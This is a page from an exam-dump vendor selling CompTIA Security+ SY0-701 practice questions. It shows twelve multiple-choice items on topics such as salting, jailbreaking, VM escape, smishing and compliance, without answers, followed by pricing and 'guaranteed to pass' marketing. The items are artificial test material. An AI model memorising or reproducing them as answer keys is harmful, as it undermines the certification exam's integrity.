An analyst identifies that multiple users have the same passwords, but the hashes appear to be completely different. Which of the following most likely explains this issue?

Options:

A.

Data masking

B.

Salting

C.

Key escrow

D.

Tokenization

Buy Now
Questions 256

The Chief Information Security Officer (CISO) at a large company would like to gain an understanding of how the company ' s security policies compare to the requirements imposed by external regulators. Which of the following should the CISO use?

Options:

A.

Penetration test

B.

Internal audit

C.

Attestation

D.

External examination

Buy Now
Questions 257

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

Options:

A.

Cross-site scripting

B.

Buffer overflow

C.

Jailbreaking

D.

Side loading

Buy Now
Questions 258

A company processes and stores sensitive data on its own systems. Which of the following steps should the company take first to ensure compliance with privacy regulations?

Options:

A.

Implement access controls and encryption.

B.

Develop and provide training on data protection policies.

C.

Create incident response and disaster recovery plans.

D.

Purchase and install security software.

Buy Now
Questions 259

A company evaluates several options that would allow employees to have remote access to the network. The security team wants to ensure the solution includes AAA to comply with internal security policies. Which of the following should the security team recommend?

Options:

A.

IPSec with RADIUS

B.

RDP connection with LDAPS

C.

Web proxy for all remote traffic

D.

Jump server with 802.1X

Buy Now
Questions 260

A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?

Options:

A.

Cross-site scripting

B.

SQL injection

C.

Race condition

D.

VM escape

Buy Now
Questions 261

Which of the following would be the best solution to deploy a low-cost standby site that includes hardware and internet access?

Options:

A.

Recovery site

B.

Cold site

C.

Hot site

D.

Warm site

Buy Now
Questions 262

Several employees received a fraudulent text message from someone claiming to be the Chief Executive Officer (CEO). The message stated:

“I’m in an airport right now with no access to email. I need you to buy gift cards for employee recognition awards. Please send the gift cards to following email address.”

Which of the following are the best responses to this situation? (Choose two).

Options:

A.

Cancel current employee recognition gift cards.

B.

Add a smishing exercise to the annual company training.

C.

Issue a general email warning to the company.

D.

Have the CEO change phone numbers.

E.

Conduct a forensic investigation on the CEO ' s phone.

F.

Implement mobile device management.

Buy Now
Questions 263

Which of the following is the best way to consistently determine on a daily basis whether security settings on servers have been modified?

Options:

A.

Automation

B.

Compliance checklist

C.

Attestation

D.

Manual audit

Buy Now
Questions 264

A human resources (HR) employee working from home leaves their company laptop open on the kitchen table. A family member walking through the kitchen reads an email from the Chief Financial Officer addressed to the HR department. The email contains information referencing company layoffs. The family member posts the content of the email to social media. Which of the following policies will the HR employee most likely need to review after this incident?

Options:

A.

Hybrid work environment

B.

Operations security

C.

Data loss prevention

D.

Social engineering

Buy Now
Questions 265

An organization’s internet-facing website was compromised when an attacker exploited a buffer overflow. Which of the following should the organization deploy to best protect against similar attacks in the future?

Options:

A.

NGFW

B.

WAF

C.

TLS

D.

SD-WAN

Buy Now
Questions 266

A new security regulation was announced that will take effect in the coming year. A company must comply with it to remain in business. Which of the following activities should the company perform next?

Options:

A.

Gap analysis

B.

Policy review

C.

Security procedure evaluation

D.

Threat scope reduction

Buy Now
Exam Code: SY0-701
Exam Name: CompTIA Security+ Exam 2026
Last Update: Jul 4, 2026
Questions: 887

PDF + Testing Engine

$49.5  $164.99

Testing Engine

$37.5  $124.99
buy now SY0-701 testing engine

PDF (Q&A)

$31.5  $104.99
buy now SY0-701 pdf
dumpsmate guaranteed to pass

24/7 Customer Support

DumpsMate's team of experts is always available to respond your queries on exam preparation. Get professional answers on any topic of the certification syllabus. Our experts will thoroughly satisfy you.

Site Secure

mcafee secure

TESTED 04 Jul 2026